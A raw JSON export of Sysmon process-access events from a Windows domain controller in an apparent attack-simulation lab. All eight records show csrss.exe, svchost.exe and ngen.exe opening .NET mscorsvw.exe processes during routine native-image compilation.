{"EventTime":"2020-08-01 07:03:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8958,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:03.310\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13A7-5F25-0000-001043FD1000}\r\nTargetProcessId: 4904\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:03.310","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13A7-5F25-0000-001043FD1000}","TargetProcessId":"4904","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8959,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:03.310\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13A7-5F25-0000-001043FD1000}\r\nTargetProcessId: 4904\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:03.310","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13A7-5F25-0000-001043FD1000}","TargetProcessId":"4904","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8960,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:03.341\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13A7-5F25-0000-0010E1001100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:03.341","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13A7-5F25-0000-0010E1001100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8961,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:03.341\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13A7-5F25-0000-0010E1001100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:03.341","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13A7-5F25-0000-0010E1001100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8962,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:03.357\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13A7-5F25-0000-0010E1001100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:03.357","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13A7-5F25-0000-0010E1001100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8963,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:03.388\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13A7-5F25-0000-001064041100}\r\nTargetProcessId: 3704\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:03.388","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13A7-5F25-0000-001064041100}","TargetProcessId":"3704","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8964,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:03.388\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13A7-5F25-0000-001064041100}\r\nTargetProcessId: 3704\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:03.388","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13A7-5F25-0000-001064041100}","TargetProcessId":"3704","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8965,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:03.388\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13A7-5F25-0000-001064041100}\r\nTargetProcessId: 3704\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:03.388","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13A7-5F25-0000-001064041100}","TargetProcessId":"3704","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
